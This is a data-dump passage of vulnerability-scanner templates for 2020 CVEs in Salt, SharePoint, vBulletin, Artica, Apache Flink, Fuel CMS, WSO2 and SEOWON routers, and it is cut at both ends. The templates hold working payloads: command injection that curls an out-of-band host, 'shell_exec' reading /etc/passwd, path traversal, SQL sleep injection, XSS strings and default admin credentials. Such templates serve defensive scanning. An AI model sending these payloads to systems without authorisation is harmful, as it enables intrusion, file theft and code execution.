pikpikcu\n severity: high\n description: |\n Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to restart the device remotely via specially crafted packets that can cause a denial-of-service condition. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.\n impact: |\n An attacker can exploit this vulnerability to disrupt the functionality of the conference station, leading to a denial of service for legitimate users.\n remediation: |\n Apply the latest firmware update provided by Cisco to mitigate this vulnerability.\n reference:\n - http://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html\n - https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-16139\n - https://github.com/anonymous364872/Rapier_Tool\n - https://github.com/blacklanternsecurity/Cisco-7937G-PoCs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n cvss-score: 7.5\n cve-id: CVE-2020-16139\n epss-score: 0.06015\n epss-percentile: 0.93331\n cpe: cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: unified_ip_conference_station_7937g_firmware\n tags: cve,cve2020,dos,cisco,packetstorm\n\nhttp:\n - raw:\n - |\n POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/xml\"\n\n - type: word\n words:\n - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'\n\n - type: status\n status:\n - 200\n# digest: 
490a004630440220159a501f6273ac0121f121b697bdc653c01a5330a5b0fe9fe2ccfa30a638147e022056695f2f7cd28cc34e9a3e87f3d7395878fbebdbc29b626b1b9f94c57c874c78:922c64590222798bb761d5b6d8e72950", "hash": "cf42a6ae5d3573c61f31004db69e0ecd", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a3" }, "name": "CVE-2020-16846.yaml", "content": "id: CVE-2020-16846\n\ninfo:\n name: SaltStack <=3002 - Shell Injection\n author: dwisiswant0\n severity: critical\n description: |\n SaltStack Salt through 3002 allows an unauthenticated user with network access to the Salt API to use shell injections to run code on the Salt-API using the SSH client.\n remediation: |\n Upgrade to a patched version of SaltStack (>=3003) to mitigate this vulnerability.\n reference:\n - https://saltproject.io/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/\n - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag\n - https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846\n - https://nvd.nist.gov/vuln/detail/CVE-2020-16846\n - http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00029.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-16846\n cwe-id: CWE-78\n epss-score: 0.97467\n epss-percentile: 0.99957\n cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: saltstack\n product: salt\n tags: cve2020,cve,vulhub,saltstack,kev\nvariables:\n priv: \"{{to_lower(rand_text_alpha(5))}}\"\n roaster: \"{{to_lower(rand_text_alpha(6))}}\"\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/run\"\n\n body: \"token=1337&client=ssh&tgt=*&fun=a&roster={{roaster}}&ssh_priv={{priv}}\"\n\n headers:\n Content-Type: application/x-www-form-urlencoded # CherryPy will abort w/o define this header\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - regex(\"CherryPy\\/([0-9.]+)\", header) || regex(\"CherryPy ([0-9.]+)\", body)\n\n - type: word\n part: 
body\n words:\n - \"An unexpected error occurred\"\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100e5e214d6bfbb716a422d227690fe14f4ced278baebc9530e6be6dda0c04edda5022100a4a672fdb2e3ed1d081264ca1f8709c46adb9bc876251bfd3a0495cb0c41ce47:922c64590222798bb761d5b6d8e72950", "hash": "5e7ff93fda9856f96fdc55b82cb277de", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a4" }, "name": "CVE-2020-16952.yaml", "content": "id: CVE-2020-16952\n\ninfo:\n name: Microsoft SharePoint - Remote Code Execution\n author: dwisiswant0\n severity: high\n description: Microsoft SharePoint is vulnerable to a remote code execution when the software fails to check the source markup of an application package.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to a complete compromise of the SharePoint server.\n remediation: |\n Apply the latest security updates provided by Microsoft to address this vulnerability.\n reference:\n - https://srcincite.io/pocs/cve-2020-16952.py.txt\n - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952\n - https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md\n - https://nvd.nist.gov/vuln/detail/CVE-2020-16952\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L\n cvss-score: 8.6\n cve-id: CVE-2020-16952\n cwe-id: CWE-346\n epss-score: 0.90125\n epss-percentile: 0.9872\n cpe: cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: microsoft\n product: sharepoint_enterprise_server\n tags: cve,cve2020,msf,sharepoint,iis,microsoft,ssi,rce\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n 
matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"15\\\\.0\\\\.0\\\\.(4571|5275|4351|5056)\"\n - \"16\\\\.0\\\\.0\\\\.(10337|10364|10366)\"\n # - \"16.0.10364.20001\"\n condition: or\n\n - type: regex\n part: header\n regex:\n - \"(?i)(Microsoftsharepointteamservices:)\"\n\n - type: status\n status:\n - 200\n - 201\n condition: or\n# digest: 4b0a00483046022100e0bdde1f10a3c7f9e1773ab527f8cb52ceb62bee9d4dd6c22904db572ee54ac9022100e7db923ffc75f38ed9852638743eae25f446b79004905c011578b05d3c7cfc47:922c64590222798bb761d5b6d8e72950", "hash": "5162d357445c8ebe91411fc4b171e968", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a5" }, "name": "CVE-2020-17362.yaml", "content": "id: CVE-2020-17362\n\ninfo:\n name: Nova Lite < 1.3.9 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Nova Lite before 1.3.9 for WordPress is susceptible to reflected cross-site scripting via search.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to Nova Lite version 1.3.9 or later to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17362\n - https://themes.trac.wordpress.org/browser/nova-lite/1.3.9/readme.txt?rev=134076\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-17362\n cwe-id: CWE-79\n epss-score: 0.00101\n epss-percentile: 0.412\n cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: themeinprogress\n product: nova_lite\n framework: wordpress\n tags: 
cve2020,cve,wordpress,xss,wp-plugin,wpscan,unauth,themeinprogress\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: body\n words:\n - \"nova-lite\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ab34023f96ff9b73ad9b41e60f530d15a806426ebaf266dfa573af429f707066022027a8e1e0e951dbd0be795667ca7497abc9000048460f06fbe56fd555a9416315:922c64590222798bb761d5b6d8e72950", "hash": "4c0b2aeffcbba93f1e69d6713f82e751", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a6" }, "name": "CVE-2020-17453.yaml", "content": "id: CVE-2020-17453\n\ninfo:\n name: WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting\n author: madrobot\n severity: medium\n description: WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. 
This can be performed in both authenticated and unauthenticated requests.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade to a patched version of WSO2 Carbon Management Console (5.11 or above) or apply the provided security patch to mitigate this vulnerability.\n reference:\n - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17453\n - https://twitter.com/JacksonHHax/status/1374681422678519813\n - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2021/WSO2-2020-1132/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-17453\n cwe-id: CWE-79\n epss-score: 0.00845\n epss-percentile: 0.81776\n cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wso2\n product: api_manager\n tags: cve2020,cve,xss,wso2\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'';alert('document.domain')//';\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210092b852f9302eb1a2350db061c59c70735a053c59eb95b4415e36f93732431357022100c8e4a5c459eca3f34966e4ce587f09ac4174a89e0f127b7c9a14f5cf381d461b:922c64590222798bb761d5b6d8e72950", "hash": "0862ef39223a709499fe93e02a292cdd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a7" }, "name": "CVE-2020-17456.yaml", "content": "id: CVE-2020-17456\n\ninfo:\n name: SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code 
Execution\n author: gy741,edoardottt\n severity: critical\n description: SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17456\n - http://packetstormsecurity.com/files/158933/Seowon-SlC-130-Router-Remote-Code-Execution.html\n - http://packetstormsecurity.com/files/166273/Seowon-SLR-120-Router-Remote-Code-Execution.html\n - https://www.exploit-db.com/exploits/50821\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-17456\n cwe-id: CWE-78\n epss-score: 0.96263\n epss-percentile: 0.99495\n cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: seowonintech\n product: slc-130_firmware\n tags: cve,cve2020,seowon,oast,packetstorm,rce,router,unauth,iot,seowonintech\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/login.cgi HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}\n Content-Type: application/x-www-form-urlencoded\n\n browserTime=081119502020¤tTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin\n - |\n POST /cgi-bin/system_log.cgi HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018\n\n matchers-condition: 
and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100dfd063b9fa64a8c67ede0a35c9c5ef23fc7ffd9b31d32de5343eaa430bd12815022063f498b2e3e49255cc16b78a9ae2e77f66144915d845e6feae3ced267930d7a9:922c64590222798bb761d5b6d8e72950", "hash": "fdab899cb6e902ff83753d06c5636129", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a8" }, "name": "CVE-2020-17463.yaml", "content": "id: CVE-2020-17463\n\ninfo:\n name: Fuel CMS 1.4.7 - SQL Injection\n author: Thirukrishnan\n severity: critical\n description: |\n FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: Fixed in version 115\n reference:\n - https://www.exploit-db.com/exploits/48741\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17463\n - http://packetstormsecurity.com/files/158840/Fuel-CMS-1.4.7-SQL-Injection.html\n - https://getfuelcms.com/\n - https://cwe.mitre.org/data/definitions/89.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-17463\n cwe-id: CWE-89\n epss-score: 0.94399\n epss-percentile: 0.99154\n cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: thedaylightstudio\n product: fuel_cms\n shodan-query: http.title:\"fuel cms\"\n tags: cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio\n\nhttp:\n - raw:\n - |\n GET /fuel/login/ HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /fuel/login/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: 
application/x-www-form-urlencoded\n Referer: {{RootURL}}\n\n user_name={{username}}&password={{password}}&Login=Login&forward=\n - |\n @timeout: 10s\n GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1\n Host: {{Hostname}}\n X-Requested-With: XMLHttpRequest\n Referer: {{RootURL}}\n\n payloads:\n username:\n - admin\n password:\n - admin\n attack: pitchfork\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code_3 == 200'\n - 'contains(body_1, \"FUEL CMS\")'\n condition: and\n# digest: 490a0046304402200a2e9d98f445334774bd7fe2ae6afd6669809096d55a82f9b6be1e9015a639f2022025f1354f6fd86600a6cc7c44e2401397db0d4619dc406e7213f617f08f281f9f:922c64590222798bb761d5b6d8e72950", "hash": "4bbb1ea6f9d7663d2a52ea5c97664100", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a9" }, "name": "CVE-2020-17496.yaml", "content": "id: CVE-2020-17496\n\ninfo:\n name: vBulletin 5.5.4 - 5.6.2 - Remote Command Execution\n author: pussycat0x\n severity: critical\n description: 'vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. 
NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.'\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.\n remediation: |\n Upgrade vBulletin to a version that is not affected by CVE-2020-17496.\n reference:\n - https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17496\n - https://seclists.org/fulldisclosure/2020/Aug/5\n - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch\n - https://cwe.mitre.org/data/definitions/78.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-17496\n cwe-id: CWE-74\n epss-score: 0.97451\n epss-percentile: 0.99949\n cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vbulletin\n product: vbulletin\n tags: cve2020,cve,vbulletin,rce,kev,tenable,seclists\n\nhttp:\n - raw:\n - |\n POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206afba9382ef50078a6e10f45af89877a09050cee4ee4f09332c699c120cc20570221009ee5bdbc704e8afa38af4a3db4866cc3cae4b1bdec288b453ac41adf3db45155:922c64590222798bb761d5b6d8e72950", "hash": "4e63d157c9d22945818fbe1c8b0ee386", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081aa" }, "name": "CVE-2020-17505.yaml", "content": "id: CVE-2020-17505\n\ninfo:\n name: Artica Web Proxy 4.30 - OS Command Injection\n author: dwisiswant0\n severity: high\n 
description: Artica Web Proxy 4.30 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system.\n remediation: |\n Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - http://packetstormsecurity.com/files/159267/Artica-Proxy-4.30.000000-Authentication-Bypass-Command-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17505\n - https://blog.max0x4141.com/post/artica_proxy/\n - https://github.com/sobinge/nuclei-templates\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-17505\n cwe-id: CWE-78\n epss-score: 0.96502\n epss-percentile: 0.99502\n cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: articatech\n product: web_proxy\n tags: cve,cve2020,proxy,packetstorm,rce,artica,articatech\n\nhttp:\n - raw:\n - |\n GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n - |\n GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"array(2)\"\n - \"Position: ||whoami||\"\n - \"root\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204bd1705a9455e6871cb3419d303ccfad65755a7bdb6286bf4d77df2f8595aa2202200abf4f4c62097d8b13842832edda25d4bf39ef1baa841854228d08fc794f7316:922c64590222798bb761d5b6d8e72950", "hash": 
"67dd1ca05b4e30294f741edbaf54c6e9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ab" }, "name": "CVE-2020-17506.yaml", "content": "id: CVE-2020-17506\n\ninfo:\n name: Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection\n author: dwisiswant0\n severity: critical\n description: Artica Web Proxy 4.30.00000000 allows a remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary SQL queries, potentially leading to unauthorized access and data leakage.\n remediation: |\n Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17506\n - http://packetstormsecurity.com/files/158868/Artica-Proxy-4.3.0-Authentication-Bypass.html\n - https://blog.max0x4141.com/post/artica_proxy/\n - https://github.com/hangmansROP/proof-of-concepts\n - https://github.com/merlinepedra/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-17506\n cwe-id: CWE-89\n epss-score: 0.96009\n epss-percentile: 0.99439\n cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: articatech\n product: web_proxy\n tags: cve,cve2020,artica,proxy,packetstorm,articatech,sqli\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;\"\n\n host-redirects: true\n max-redirects: 1\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"artica-applianc\"\n\n - type: word\n part: header\n words:\n - \"PHPSESSID\"\n\n - type: status\n status:\n - 200\n - 
301\n - 302\n condition: or\n\n extractors:\n - type: kval\n kval:\n - \"PHPSESSID\"\n# digest: 4a0a00473045022100f662e4c6ca11d25724a6f673e821f724e1459f0dc49dd7eccfb95ba6f10ec21302203fdd45b3e584bf02ad138c2b3ac177cb72cc83412a78f49d7a0855fe3f749bd7:922c64590222798bb761d5b6d8e72950", "hash": "3eb40e9fe1380eca5080ac17cfec1837", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ac" }, "name": "CVE-2020-17518.yaml", "content": "id: CVE-2020-17518\n\ninfo:\n name: Apache Flink 1.5.1 - Local File Inclusion\n author: pdteam\n severity: high\n description: |\n Apache Flink 1.5.1 is vulnerable to local file inclusion because of a REST handler that allows file uploads to an arbitrary location on the local file system through a maliciously modified HTTP HEADER.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.\n remediation: |\n Upgrade Apache Flink to a version that is not affected by the vulnerability (1.5.2 or later).\n reference:\n - https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518\n - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261%40%3Cdev.flink.apache.org%3E\n - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261@%3Cuser.flink.apache.org%3E\n - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261@%3Cdev.flink.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17518\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-17518\n cwe-id: CWE-22,CWE-23\n epss-score: 0.86056\n epss-percentile: 0.98301\n cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: flink\n tags: cve2020,cve,lfi,flink,fileupload,vulhub,apache,intrusive\n\nhttp:\n - raw:\n - |\n 
POST /jars/upload HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y\n\n ------WebKitFormBoundaryoZ8meKnrrso89R6Y\n Content-Disposition: form-data; name=\"jarfile\"; filename=\"../../../../../../../tmp/poc\"\n\n {{randstr}}\n ------WebKitFormBoundaryoZ8meKnrrso89R6Y--\n - |\n GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_2, \"{{randstr}}\") && status_code == 200'\n# digest: 490a0046304402205570104598ee83206abdcb1418c3b615a3cbc4e3408dbf1e52c88c9ae2814b52022050e866d7f1f34ac958e583294080c2e7b8f99d49f90eddb2c4d855b851709e2d:922c64590222798bb761d5b6d8e72950", "hash": "99971b140e63b1f84ea5128e8ef3b824", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ad" }, "name": "CVE-2020-17519.yaml", "content": "id: CVE-2020-17519\n\ninfo:\n name: Apache Flink - Local File Inclusion\n author: pdteam\n severity: high\n description: Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process (aka local file inclusion).\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Apache Flink to mitigate the vulnerability.\n reference:\n - https://github.com/B1anda0/CVE-2020-17519\n - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E\n - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cdev.flink.apache.org%3E\n - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cuser.flink.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17519\n classification:\n cvss-metrics: 
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-17519\n cwe-id: CWE-552\n epss-score: 0.97103\n epss-percentile: 0.99737\n cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: flink\n tags: cve,cve2020,apache,lfi,flink\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204b890b4ec1857214ffda11340aa1a4661bbb5dc35de8a1740ccd531d92910d26022008bfdeb53b6cdc73ff693a31a0ee9b55e4aa92c53dfe39bc0349491462a4f66c:922c64590222798bb761d5b6d8e72950", "hash": "7f979e5b81b3166f9647a5b6ca390b8f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ae" }, "name": "CVE-2020-17526.yaml", "content": "id: CVE-2020-17526\n\ninfo:\n name: Apache Airflow <1.10.14 - Authentication Bypass\n author: piyushchhiroliya\n severity: high\n description: |\n Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. 
An attacker on site A can access unauthorized Airflow on site B through the site A session.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized execution of arbitrary code.\n remediation: Change default value for [webserver] secret_key config.\n reference:\n - https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise\n - https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E\n - http://www.openwall.com/lists/oss-security/2020/12/21/1\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17526\n - https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352@%3Cannounce.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 7.7\n cve-id: CVE-2020-17526\n cwe-id: CWE-287\n epss-score: 0.08372\n epss-percentile: 0.93787\n cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: apache\n product: airflow\n fofa-query: Apache Airflow\n tags: cve,cve2020,apache,airflow,auth-bypass\n\nhttp:\n - 